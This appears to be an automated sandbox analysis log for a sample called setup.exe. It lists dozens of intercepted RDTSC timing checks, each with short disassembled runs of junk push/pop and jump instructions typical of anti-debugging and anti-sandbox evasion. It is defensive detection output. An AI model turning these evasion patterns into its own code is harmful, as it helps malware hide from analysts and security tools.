                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE9AB3 second address: EE9AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE0B4522B16h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE9AC2 second address: EE9AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE9D63 second address: EE9D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FE0B4522B16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE9D6F second address: EE9D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE9D7A second address: EE9D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE9EE1 second address: EE9EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE9EE5 second address: EE9EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE9EE9 second address: EE9EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EEA456 second address: EEA45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EEA5AF second address: EEA5D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE0B4F44DD5h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF2548 second address: EF2558 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FE0B4522B16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF2558 second address: EF2582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE0B4F44DC6h 0x0000000a jmp 00007FE0B4F44DD5h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007FE0B4F44DC6h 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF285C second address: EF2878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FE0B4522B21h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF2878 second address: EF287E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF287E second address: EF2884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF2884 second address: EF2888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF29CE second address: EF29D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF2B5E second address: EF2B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FE0B4F44DC6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF2CFF second address: EF2D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF1B7A second address: EF1B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007FE0B4F44DCAh 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF7748 second address: EF774C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF774C second address: EF776A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FE0B4F44DCAh 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FE0B4F44DC6h 0x00000014 jl 00007FE0B4F44DC6h 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF776A second address: EF776E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF776E second address: EF779D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007FE0B4F44DC6h 0x00000011 popad 0x00000012 push ebx 0x00000013 jmp 00007FE0B4F44DD6h 0x00000018 pushad 0x00000019 popad 0x0000001a pop ebx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EFC07C second address: EFC082 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F0F031 second address: F0F035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3FEA8 second address: E3FEC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FE0B4522B16h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3FEC4 second address: E3FEC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3FEC8 second address: E3FECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3FECE second address: E3FEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE0B4F44DD5h 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F1AF72 second address: F1AF76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F1AF76 second address: F1AF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F21CB9 second address: F21CC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F21CC8 second address: F21CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F21CCE second address: F21D0A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE0B4522B3Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FE0B4522B16h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F21D0A second address: F21D14 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F21D14 second address: F21D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B21h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jp 00007FE0B4522B16h 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F21D38 second address: F21D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F21EB6 second address: F21EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F21EC1 second address: F21EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F21EC5 second address: F21EDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F21EDC second address: F21EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F222FA second address: F2231F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B28h 0x00000007 ja 00007FE0B4522B16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F2231F second address: F22327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F22327 second address: F2232C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F2232C second address: F22343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FE0B4F44DC6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jbe 00007FE0B4F44DC6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F22677 second address: F2267C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F2267C second address: F22682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F22682 second address: F2268C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FE0B4522B16h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F22818 second address: F2284F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE0B4F44DC6h 0x00000008 jmp 00007FE0B4F44DD2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007FE0B4F44DD2h 0x00000015 jmp 00007FE0B4F44DCAh 0x0000001a push edi 0x0000001b pop edi 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F2284F second address: F22863 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jc 00007FE0B4522B16h 0x0000000d jg 00007FE0B4522B16h 0x00000013 pop esi 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F26DF3 second address: F26E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jg 00007FE0B4F44DC6h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FE0B4F44DC6h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E44F34 second address: E44F3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E44F3A second address: E44F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FE0B4F44DC6h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E44F48 second address: E44F4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E44F4C second address: E44F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F26962 second address: F26970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FE0B4522B18h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F26970 second address: F26983 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007FE0B4F44DC6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F26983 second address: F26989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F26989 second address: F2698E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F2698E second address: F26994 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F26B10 second address: F26B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FE0B4F44DD4h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F26B2D second address: F26B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F26B33 second address: F26B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F26B37 second address: F26B4F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE0B4522B16h 0x00000008 jbe 00007FE0B4522B16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007FE0B4522B16h 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F31F09 second address: F31F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F31F0D second address: F31F11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F45E15 second address: F45E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DD4h 0x00000009 pushad 0x0000000a popad 0x0000000b jp 00007FE0B4F44DC6h 0x00000011 popad 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F45E36 second address: F45E49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F45CAC second address: F45CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F61915 second address: F6191A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F6191A second address: F61937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4F44DD3h 0x00000009 jnl 00007FE0B4F44DC6h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F61937 second address: F6193B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F6193B second address: F61941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F606E0 second address: F606E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F60A28 second address: F60A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F60A2E second address: F60A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE0B4522B1Ah 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FE0B4522B25h 0x00000012 pop edi 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F60A5B second address: F60A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DCFh 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F60D3A second address: F60D4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jns 00007FE0B4522B16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F60D4A second address: F60D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DD8h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F60D66 second address: F60D70 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F611C6 second address: F611CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F611CC second address: F611D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F611D7 second address: F611DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F63036 second address: F6303A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F688B1 second address: F688D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jnp 00007FE0B4F44DD7h 0x0000000e jmp 00007FE0B4F44DD1h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F6896E second address: F68985 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007FE0B4522B16h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F68985 second address: F689F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DD2h 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c and edx, dword ptr [ebp+122D1C73h] 0x00000012 push 00000004h 0x00000014 jne 00007FE0B4F44DD6h 0x0000001a call 00007FE0B4F44DC9h 0x0000001f jmp 00007FE0B4F44DCEh 0x00000024 push eax 0x00000025 jmp 00007FE0B4F44DD6h 0x0000002a mov eax, dword ptr [esp+04h] 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 jne 00007FE0B4F44DC6h 0x00000037 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F689F7 second address: F68A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007FE0B4522B16h 0x0000000f popad 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F68A0F second address: F68A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F68CA3 second address: F68CC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F68CC3 second address: F68CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F68CC7 second address: F68CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F6C086 second address: F6C08E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47E01A4 second address: 47E01AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47E01AA second address: 47E01E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE0B4F44DD6h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE0B4F44DD7h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47C0F11 second address: 47C0F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47C0F15 second address: 47C0F1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
